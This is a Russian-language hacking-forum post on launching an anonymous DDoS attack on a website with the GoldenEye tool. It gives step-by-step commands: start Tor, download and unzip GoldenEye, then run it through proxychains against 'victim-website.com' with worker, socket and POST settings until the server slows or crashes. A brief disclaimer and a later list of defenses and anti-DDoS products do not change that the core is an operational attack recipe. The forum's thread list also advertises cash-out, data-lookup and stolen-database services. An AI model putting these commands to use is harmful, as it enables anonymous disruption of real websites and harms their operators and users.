Отказ от обслуживания. Анонимная DDoS атака на веб-сайт с помощью GoldenEye и способы защиты

Admin

Original poster
Administrator
Сообщения
916
Реакции
753
Посетить сайт
DDOS.png
Кратко о «Дудосе»
Что это такое?

Википедия гласит:

DDoS (

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

Distributed Denial of Service, дословно «Распределенный отказ в обслуживании») —

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

на вычислительную систему с целью довести её до отказа, то есть создание таких условий, при которых добросовестные пользователи системы не смогут получить доступ к предоставляемым системным ресурсам (серверам), либо этот доступ будет затруднён.
Как работает данная атака и кто ею пользуется?

У каждого веб-сервера имеются ограничения по количеству запросов, которые веб-сервер может может обслуживать одновременно. Если количество запросов будет превышать допустимую норму — вполне возможно следующее:

  1. Замедление работы сервера (замедление обработки запросов)
  2. Полный отказ в обслуживании запросов
Чаще всего злоумышленники добиваются второго — полного отказа в обслуживании. Мотивы могут быть разными: начиная с защиты пользователей от мошеннических сайтов и заканчивая банальной скукой.

Но следует сказать, что пользуются данными атаками не только злоумышленники, но и «белые хакеры», т.е. пентестеры. Этой атакой этичные хакеры тестируют веб-сервера на мощность и способность обрабатывать большое количество запросов одновременно.

Работает DDoS так: злоумышленник создает сеть из «зомби-компьютеров» (на самом деле это не обязательно компьютеры: годными для данной атаки являются все устройства, способные отправлять запросы), и впоследствии использует эту сеть для проведения атаки.

Представим ситуацию: максимальный вес трафика, который может принимать сервер — 1 Гб. Злоумышленник пытается достичь или преодолеть этот барьер. Если получается — сервер сначала тормозит, а потом может и лечь.

Теперь самое интересное: как провести подобную атаку? Сразу предупредим — все, описанное и рассказанное ниже предоставлено лишь в ознакомительных целях. Чужие сервера ломать нельзя, за это могут быть проблемы законом. Мы тебя предупредили.
Необходимые инструменты
  1. EtherApe - графический монитор сети, который графически отображает сетевую активность. Хосты и ссылки меняются в размере с трафиком. Отображение цветовых протоколов.
  2. Service Tor - Tor позволяет клиентам и ретрансляторам предлагать скрытые услуги. То есть вы можете предложить веб-сервер, SSH-сервер и т.д. Не раскрывая свой IP-адрес своим пользователям.
  3. Proxychains - последняя версия Proxychains поддерживает SOCKS5, SOCKS4 и HTTP CONNECT. Прокси-цепи можно смешивать с разными типами прокси.
  4. GoldenEye - GoldenEye - приложение на python, предназначенное только для целей тестирования безопасности.
Как выполнить DDOS атаку на сайт?
1. Запустите etherape: etherape, появится всплывающее окно, которое графически отображает сетевую активность.

2. Запустите службу TOR:

service tor start

3. Загрузите Goldeneye


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


wget

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



4. После загрузки распакуйте его в папку

unzip GoldenEye-master.zip

5. Начать атаку

/GoldenEye-master# proxychains ./goldeneye.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



b7979bfffbe78d61550fa.png

  • Добавьте значения для рабочих (-w), сокетов (-s) и метода (-m)
./goldeneye.py victim-website.com -w 100 -s 70 -m post

Если вы не остановите атаку, то в некоторых случаях она "взорвется". Чтобы остановить атаку просто нажмите CTRL+C.
Готово. Через какое-то время сервер будет тормозить, а затем, возможно, ляжет.

Общая защита от DDOS-атаки
  • Снижение скорости IP-соединения.
  • Используйте IDS, межсетевые экраны веб-приложений.
  • Tweak Connection на порог IP.
  • Защитите свои DNS-серверы.
  • Установите средства защиты. Убедитесь, что у вас установлены соответствующие средства защиты как для ваших сетей, так и для ваших приложений. Сюда входят такие ключевые инструменты, как брандмауэры, программное обеспечение для мониторинга сети и антивирусные программы, а также системы мониторинга угроз. С их помощью вы можете отслеживать базовый сетевой трафик и настраивать оповещения о необычном поведении.
  • Держите все в курсе. Все эти системы должны быть обновлены, чтобы гарантировать, что любые ошибки или проблемы исправлены. Обнаружение угроз как можно раньше - лучший способ предотвратить атаку DDoS-атак на важные сетевые инфраструктуры и повлиять на конечных пользователей.
Инструменты для предотвращения DDoS-атак
Есть несколько инструментов, которые я рекомендую для предотвращения и остановки DDoS-атак.

1. Security Event Manager
Для отслеживания поведения сети и маркировки угроз до того, как они станут чрезмерными, мне нравится SolarWinds Security Event Manager (SEM).

e046e9efad1df39cab843.png

Способность быстро реагировать на угрозу жизненно необходима, поскольку инициативы в области безопасности могут быстро стать бесполезными, если их развертывание займет слишком много времени. SEM включает в себя автоматические ответы, которые могут блокировать подозрительный IP или USB, отключать вредоносные устройства или отключать их привилегии, а также уничтожать приложения, которые ведут себя неожиданным образом. Это означает, что задержки при работе с чем-то вроде атаки DDoS сводятся к минимуму.

SEM также контролирует целостность файлов и USB, поэтому, если что-то выглядит не так, его можно остановить.

SolarWinds SEM предлагается бесплатно для тридцатидневной пробной версии. После этого вы можете посмотреть цены для каждого узла.

2. Cloudflare
4327ae5bb701daea85ff1.png

Cloudflare предлагает гибкий и масштабируемый инструмент, который объединяет несколько методов предотвращения DDoS в одном решении. Он предотвращает проникновение вредоносного и злонамеренного трафика в вашу сеть, а остальная часть сети остается функциональной и высокопроизводительной. Cloudflare использует базу данных репутации для отслеживания потенциальных угроз от злоумышленников.

Для предприятий Cloudflare стоит 200 долларов США в месяц, но на уровне предприятия вам необходимо связаться с Cloudflare для получения расценок.

3. Imperva
51a064bf9a360e03e6165.png

Средство защиты Imperva DDoS защищает всю сеть и защищает от атак с помощью обработки пакетов большой емкости. Он обеспечивает защиту от DDoS-атак как всегда, так и по требованию, в зависимости от того, что больше всего подходит вашему бизнесу, а также включает в себя автоматическое обновление панелей мониторинга, отображающих информацию о трафике атак. Основным недостатком инструмента Imperva является то, что он ограничен защитой от DDoS-атак.
 

Вложения

  • 1579953569920.png
    1579953569920.png
    53.8 КБ · Просмотры: 7
Последнее редактирование:
Название темы
Автор Заголовок Раздел Ответы Дата
Emilio_Gaviriya Статья Сниффинг и защита от него. Анонимность и приватность 0
Support81 Кипр обманывает пенсионеров: миллионные убытки от поддельного ПО Новости в сети 0
srv24 Продам SRV24 - выделенные серверы в 193 странах мира от 15$! Скидки при оплате на 1 год! Заходи! Сайты/Хостинг/Сервера 1
Support81 Наказание для Минобороны: как Великобритания «помогла» афганским беженцам скрыться от талибов Новости в сети 0
G Ожидает оплаты Дорвеи под ключ от эксперта | Стабильный поток клиентов и лидов Сайты/Хостинг/Сервера 0
Multi-VPN Продам MultiVPN.Bz - OpenVPN, DoubleVPN, без логов, c защитой от утечек IP Дедики/VPN/соксы/ssh 5
Support81 Gemini: революция ИИ от Google AI - чат-бот, превзошедший человека Новости в сети 0
turbion0 В Пензе мошенница получила от государства миллион рублей на несуществующих детей Новости в сети 0
turbion0 Мошенники пишут и звонят людям с просьбой денег от лица мэра Новости в сети 0
Emilio_Gaviriya Статья Защита от пробивал: как создать фейковые данные о себе в «Глазе Бога». Анонимность и приватность 3
GetLeads Закрыто Обучение: рассылкам\инвайту\регистрации и другому в Telegram. В среднем проф спамеры зарабатывают от 2000$+ Ищу работу. Предлагаю свои услуги. 4
pink blink Продам Базы данных РФ и Европы от Pink Blink — найду для вас всё Все что не подошло по разделу 0
Support81 50 миллионов пострадавших: взломщик оператора связи T-Mobile пытается ускользнуть от закона Новости в сети 0
Support81 Запрет на выплаты вымогателям: как отказ от выкупа усилит атаки на критическую инфраструктуру Новости в сети 0
Support81 Не только умный, но и опасный: темная сторона ИИ от Microsoft Новости в сети 0
Support81 Orbit Bridge пострадал от эксплойта стоимостью 82 миллиона долларов Новости в сети 0
TrashHellSoDomy Интересно Немного юмора от TrashHellSoDomy Юмор 11
Aimer2033 Интересно Мегамаркет. Скидка 1000 рублей при покупке от 3000 рублей на все, на первый заказ. Другое 18
gelt Web и мобильная разработка от ROVA Agency ️ Услуги дизайнеров/веб-разработчиков 0
Support81 Важно!!! Создаем свой VPN с защищенным от блокировок протоколом AmneziaWG, или WireGuard на максималках Анонимность и приватность 3
BelarusDM Продавец Базы данных от BelarusDM: Лучшие физы для ОФИСОВ и КОЛЛ ЦЕНТРОВ! Зарплатники ВТБ, Росбанка, СБП и тд. Доступы - FTP, shell'ы, руты, sql-inj, БД 1
Yakuza Ожидает оплаты ОБНАЛ-СЕРВИС YAKUZA - №1 В БЕЛАРУСИ - ДЕПОЗИТ 700.000 - от 15% ГАРАНТ Ищу работу. Предлагаю свои услуги. 1
K VOIP SIP телефония от Kratos | верифицированные аккаунты 1ATS, MCN, Octoline Продажа софта 0
B СКИДКИ 50% от @TRAVE1CAT - ОТЕЛИ, АВИАБИЛЕТЫ, ЭКСКУРСИИ, АРЕНДА АВТО Ищу работу. Предлагаю свои услуги. 0
Support81 SecondDate: шпионское ПО от АНБ уже следит за всем миром Новости в сети 0
M Пробив от секретной службы Mossad (ПРОБИВ по всем структурам, комплексные решения под ваш запрос) Корзина 0
T 20 $ на дейтинге в сутки от канала Схематозы Корзина 0
Support81 Швейцарская иллюзия безопасности: что скрывает почтовый сервис ProtonMail от своих пользователей? Новости в сети 0
semsvm Интересно Видео - шутка от проживающего в Китае тик - токера Александра Зубарева,которая потрясла-шокировала весь интернет. Новости в сети 0
Support81 Эволюция FIN8: от взлома банковских терминалов до распространения вымогательского софта Новости в сети 0
Support81 Хакеры больше не плачут: доходы от вымогательских атак в этом году резко возросли Новости в сети 1
Ёшкин_кот Полный курс по взлому - от начального до продвинутого уровня! 10 частей. Kali Linux 0
turbion0 Интересно В России прошли учения на случай отключения страны от глобального интернета Новости в сети 0
yaNaSvyazi [Prince Patni] [Udemy] Раскрытие возможностей ChatGPT в науке о данных: руководство от А до Я (2023) Способы заработка 0
U Куплю номера для БК Винлайн (Winline) от 225р Предоставляю работу. Ищу специалиста. 1
BelarusDM Продавец Первый Беларусский обнал сервис от 25% Ищу работу. Предлагаю свои услуги. 69
HIDE MARKET Закрыто Банковский пробив от HIDE MARKET [Пробив,Выписки,Балансы,Счета] Анонимно.Быстро.Доступно. Корзина 1
HIDE MARKET Закрыто Мобильные операторы от HIDE MARKET [Пробив,поиск,детализация,вспышка] Анонимно.Быстро.Доступно. Корзина 1
HIDE MARKET Закрыто Гос.Пробив от HIDE MARKET [ФНС, МВД, ГИБДД, ПФР, ЗАГС и тд.] Анонимно. Быстро. Доступно. Корзина 1
Funky Mankey Ожидает оплаты ПРОБИВ от Funky Monkey Ищу работу. Предлагаю свои услуги. 7
J Закрыто Отрисовка и Печать от Jimmy Корзина 1
Benyak Ожидает оплаты Обнал USA VCC Vcc от 60-85% Ищу работу. Предлагаю свои услуги. 3
SMSvTelegram Зарабатывать на привлечении клиентов в телеграм бот. Получайте % от продажи товаров! Ищу работу. Предлагаю свои услуги. 2
C Клон USDT за 30% от номинала Финансы - биллинги, банки, кошельки, логи 1
W Продам ★ WELL-WEB ★ Хостинг от 1.99$ ★ VPS от 8.99$ ★ Серверы от 29$ ★ 7 лет на рынке ★ Лояльны к жалобам ★ Заказывайте и получите 6 мес в подарок! Дедики/VPN/соксы/ssh 0
MontanaObnal Закрыто ОБНАЛ от Montana Офисы Call-центры Корзина 1
W Продам [WELL-WEB.NET] Хостинг - от 2.49$, VDS - от 6.49$, Серверы - от 59$! [Лояльность к жалобам] Сайты/Хостинг/Сервера 2
semsvm Интересно Privat | Абуз платежной системы от 15к Способы заработка 0
M Официальный сертификат вакцинации от COVID-19 на ваших госуслугах Ищу работу. Предлагаю свои услуги. 2
DOMINUS Интересно Журналистам стала известна стоимость отвода от мобилизации в даркнете Новости в сети 2

Название темы